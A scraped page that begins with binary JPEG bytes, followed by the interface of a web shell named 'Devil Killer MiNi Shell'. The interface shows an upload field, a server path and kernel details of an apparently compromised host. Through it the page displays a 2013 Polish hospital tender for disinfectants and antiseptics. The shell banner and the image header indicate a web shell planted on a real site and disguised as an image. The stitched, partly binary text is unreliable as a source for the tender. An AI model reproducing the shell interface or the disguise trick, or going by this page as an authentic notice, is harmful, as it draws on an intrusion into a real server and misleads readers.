JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130712/274184-N-2013.html

<p class="kh_header"><b>Tarnowskie Góry: Dostawa środków dezynfekcyjnych</b><br>
<b>Numer ogłoszenia: 274184 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków dezynfekcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  PRZEDMIOT ZAMÓWIENIA
1. Przedmiotem zamówienia jest dostawa środków dezynfekcyjnych. Zamówienie składa się z 18 części tzw. Pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
Pakiet 1	Dezynfekcja rąk
Pakiet 2	Dezynfekcja rąk z zastosowaniem preparatów żelowych
Pakiet 3	Dezynfekcja skóry
Pakiet 4	Dezynfekcja błon śluzowych
Pakiet 5	Preparaty antyseptyczne na bazie jodu
Pakiet 6	Dezynfekcja i mycie endoskopów ręczne
Pakiet 7	Dezynfekcja  i mycie endoskopów w myjni - dezynfektorze OLYMPUS EUROPE mini ETD
Pakiet 8	Proszkowe preparaty dezynfekcyjne.
Pakiet 9	Dezynfekcja punktowa preparatami w granulacie 
Pakiet 10	Tabletki dezynfekcyjne
Pakiet 11	Dezynfekcja powierzchni wrażliwych na alkohol przy pomocy chusteczek dezynfekcyjnych
Pakiet 12	Preparaty dezynfekcyjne w aerozolu
Pakiet 13	Preparaty dezynfekcyjne w postaci aktywnej piany
Pakiet 14	Dezynfekcja  manualna narzędzi, powierzchni, sprzętu medycznego 
Pakiet 15	Preparaty dezynfekcyjne sporobócze szybkodziałające
Pakiet 16	Dezynfekcja i mycie narzędzi  powierzchni i sprzętu medycznego
Pakiet 17	Preparaty dezynfekcyjne do likwidacji pleśni i grzybów
Pakiet 18	Preparaty antyseptyczne na bazie oktenidyny
2. Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach D.1 ÷ D.18 do SIWZ.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4.	Wykonawca oświadczy, że:
4.1. posiada aktualne świadectwa dopuszczenia do obrotu i stosowania (jeśli zaoferowany preparat wymaga posiadania niżej wymienionych dokumentów), tj.:
a)	dla produktów kwalifikowanych, jako wyrób medyczny- deklaracja zgodności z wymaganiami zasadniczymi CE i - o ile jest to wymagane odrębnymi przepisami - certyfikat jednostki notyfikowanej, która brała udział w ocenie wyrobu medycznego;
b)	dla produktów kwalifikowanych jako produkty biobójcze - pozwolenie o którym mowa w ustawie o produktach biobójczych (Dz.U.z 2002r. Nr 175 poz. 1433);
c)	dla antyseptyków kwalifikowanych jako produkty lecznicze - pozwolenie o którym mowa w ustawie Prawo farmaceutyczne (Dz.U. z 2008 r. nr 45, poz. 271 z późn. zm.);
d)	certyfikaty dopuszczające do obrotu i stosowania, oraz potwierdzenie, że są przebadane zgodnie z normą PN EN albo w akredytowanych laboratoriach.
4.2. posiada stosowne dokumenty opisujące działanie bójcze oferowanych środków  wymaganego spektrum działania poparte opinią np. PZH lub sprawozdaniem z badań potwierdzających skuteczność produktów dezynfekcyjnych wykonanych metodami uznanymi międzynarodowo lub opisanymi w Polskich Normach lub innymi metodami wynikającymi z aktualnych przepisów obowiązującego prawa,
4.3. posiada karty charakterystyki proponowanych preparatów (należy przedłożyć przy podpisaniu umowy),
4.4. proponowany przedmiot i warunki realizacji zamówienia są zgodne z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. nr 107 poz. 679 z 20.05.2010r.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie, a w przypadku antyseptyków kwalifikowanych jako produkty lecznicze z Ustawą z dnia 6 września 2001r. Prawo Farmaceutyczne (Dz.U. z 2008 r. nr 45, poz. 271 z późn. zm.).
5. Wykonawca zobowiązany jest zapewnić nie krótszy niż 12 miesięczny okres przydatności do użycia przedmiotu zamówienia od daty dostawy do Szpitala. 
6. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
7. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu  w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do  umowy zarówno in plus jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę.

 II  TERMIN REALIZACJI ZAMÓWIENIA, SPOSÓB DOSTAWY, PŁATNOŚĆ
1. Wymagany okres realizacji zamówienia: do 12 miesięcy od dnia 29.08.2013 r. lub do wyczerpania wartości umowy w zakresie poszczególnego pakietu.
2. Sposób dostawy: loco magazyn Zamawiającego na koszt Wykonawcy w godzinach od 7:00 do 14:00.
3. Częściowe dostawy z rozładunkiem odbywać się będą w ilościach wskazanych w zamówieniu w terminie do 2 dni roboczych, po uprzednim zamówieniu drogą faxową lub emailową  przez upoważnionego pracownika Zamawiającego.
4. Miejsce dostawy: Wielospecjalistyczny Szpital Powiatowy S.A., ul. Pyskowicka 47-51, ul. Opolska 21, 42-612 Tarnowskie Góry. 
5. Warunki płatności: do 60 dni od dnia otrzymania przez Zamawiającego prawidłowo wystawionego oryginału faktury..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 29.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- katalog, folder, instrukcje użytkowania preparatu  lub inny dokument w języku polskim dla każdego zaoferowanego przedmiotu zamówienia zawierający szczegółowy opis przedmiotu zamówienia w szczególności przeznaczenie preparatu i obszar zastosowania, stężenie, spektrum działania przy danym stężeniu, czas działania oraz opis składu jakościowego i ilościowego.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony szczegółowo formularz oferty - część [C] 
2. Wypełniony formularz cenowy - część [D] 
3. Wzór oświadczeń - część [E]
4. Wzór oświadczeń - część [F]</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2. Zamawiający dopuszcza zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny oraz zmiany w przypadku ustawowej zmiany stawki podatku VAT.
3. Strony dopuszczają zmiany umowy w zakresie:
- numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
- nazwy handlowej produktu przy zachowaniu jego parametrów,
- gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
- gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
- w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
- w razie konieczności zmiany miejsca dostawy,
Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartosci umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dziale zamówień publicznych - budynek administracji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 10:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1	Dezynfekcja rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat do higienicznej i chirurgicznej dezynfekcji rąk o natychmiastowym i przedłużonym działaniu, , niealergizujący , niewysuszający skóry, nieodtłuszczający skóry, o pH neutralnym 	B,Tbc,F,V(otoczkowe i bezotoczkowe)	500 ml	400
2	Preparat do higienicznej i chirurgicznej dezynfekcji rąk o natychmiastowym i przedłużonym działaniu, , niealergizujący , niewysuszający skóry, nieodtłuszczający skóry, o pH neutralnym 	B,Tbc,F,V(otoczkowe i bezotoczkowe )	5 l	10
3	Preparat do chirurgicznego i higienicznego mycia rąk, niepowodujący wysuszania skóry rąk o pH neutralnym  nie zawierający mydła  kompatybilny z preparatem do dezynfekcji rąk	 	500 ml	1500
4	Preparat do chirurgicznego i higienicznego mycia rąk, niepowodujący wysuszania skóry rąk o pH neutralnym  nie zawierający mydła  kompatybilny z preparatem do dezynfekcji rąk	 	6 l	60
 	Emulsja o działaniu pielęgnującym i regenerującym skórę o pH neutralnym.	 	500 ml	50
5	Płyn dezynfekujący do chirurgicznego i higienicznego mycia rąk zawierający chlorhexydynę o
 przedłużonym działaniu 	B,F	500 ml	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Dezynfekcja rąk z zastosowaniem preparatów żelowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat w postaci żelu na bazie etanolu  do higienicznej i chirurgicznej dezynfekcji rąk, o działaniu natychmiastowym i przedłużonym, posiadający szerokie spektrum działania.	B,F,V otoczkowe i bezotoczkowe,Tbc,	500 ml	450
2	Preparat w postaci żelu na bazie etanolu  do higienicznej i chirurgicznej dezynfekcji rąk, o działaniu natychmiastowym i przedłużonym, posiadający szerokie spektrum działania.	B,F,V otoczkowe i bezotoczkowe,Tbc,	5 l	20
Uwaga:  Opakowania preparatów w płynie  służące do mycia, dezynfekcji i pielęgnacji rąk                  winny być odpowiednie do podajników łokciowych  typu DERMADOS.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 -Dezynfekcja skóry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat bezbarwny do odkażania i odtłuszczania skóry, bez zawartości jodu i jego związków , bez grup fenolowych.	B,Tbc,F,V (otoczkowe i bezotoczkowe)	Od 250 ml do 350 ml aerosol	300
2	Preparat bezbarwny do odkażania i odtłuszczania skóry, bez zawartości jodu i jego związków , bez grup fenolowych.	B,Tbc,F,V (otoczkowe i bez-otoczkowe)	1 l	230
3	Preparat barwiony do odkażania odtłuszczania, zabarwiania skóry,  bez zawartości jodu i jego związków, bez grup fenolowych 	B,Tbc,F,V (otoczkowe i bez-otoczkowe)	1 l	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Dezynfekcja błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Alkoholowy preparat do dezynfekcji błon śluzowych obszaru genitalnego  , zawierający etanol, chlorheksydnę, nadtlenek wodoru oraz poliwidon jako subst. zagęszczającą 
pH 4,5 - 5 , bez zawartości jodu	B,F,V,                 Pierwotniaki	1 l	130
2	Alkoholowy preparat do dezynfekcji błon śluzowych jamy ustnej i gardła , oparty o etanol, chorheksydynę, nadtlenek wodoru 
pH - 5,0 bez zawartości jodu.	B,F,V,                 	300 ml	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Preparaty antyseptyczne na bazie jodu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Preparat do dezynfekcji skóry przed iniekcjami, punkcjami, zabiegami oraz stosowany w antyseptyce śluzówek i ran, wodny roztwór pvp-jodu przy dostępności jodu 0,75g/100g. Mający również zastosowanie w antyseptycznym myciu ciała,  kąpieli w wannie , dekontaminacji MRSA, płukaniu ust, płukaniu ran , owrzodzeń , odleżyn, zgorzeli. w ginekologii i położnictwie.	B,Tbc,F,V,S,P	1 l	12
2	Preparat do dezynfekcji skóry przed iniekcjami, punkcjami, zabiegami oraz stosowany w antyseptyce śluzówek i ran, wodny roztwór pvp-jodu przy dostępności jodu 0,75g/100g. Mający również zastosowanie w antyseptycznym myciu ciała,  kąpieli w wannie , dekontaminacji MRSA, płukaniu ust, płukaniu ran , owrzodzeń , odleżyn, zgorzeli. w ginekologii i położnictwie.	B,Tbc,F,V,S,P	250 ml	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 - Dezynfekcja i mycie endoskopów ręczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Preparat dezynfekcyjny na bazie 2% aldehydu glutarowego do dezynfekcji endoskopów i termolabilnego sprzętu medycznego o działaniu sporobójczym do wielokrotnego użycia w czasie do 30 dni 
Wymagane paskowe testy kontrolne  sprawdzające aktywność roztworu	B,F,V,S,
  Tbc	5 l	8
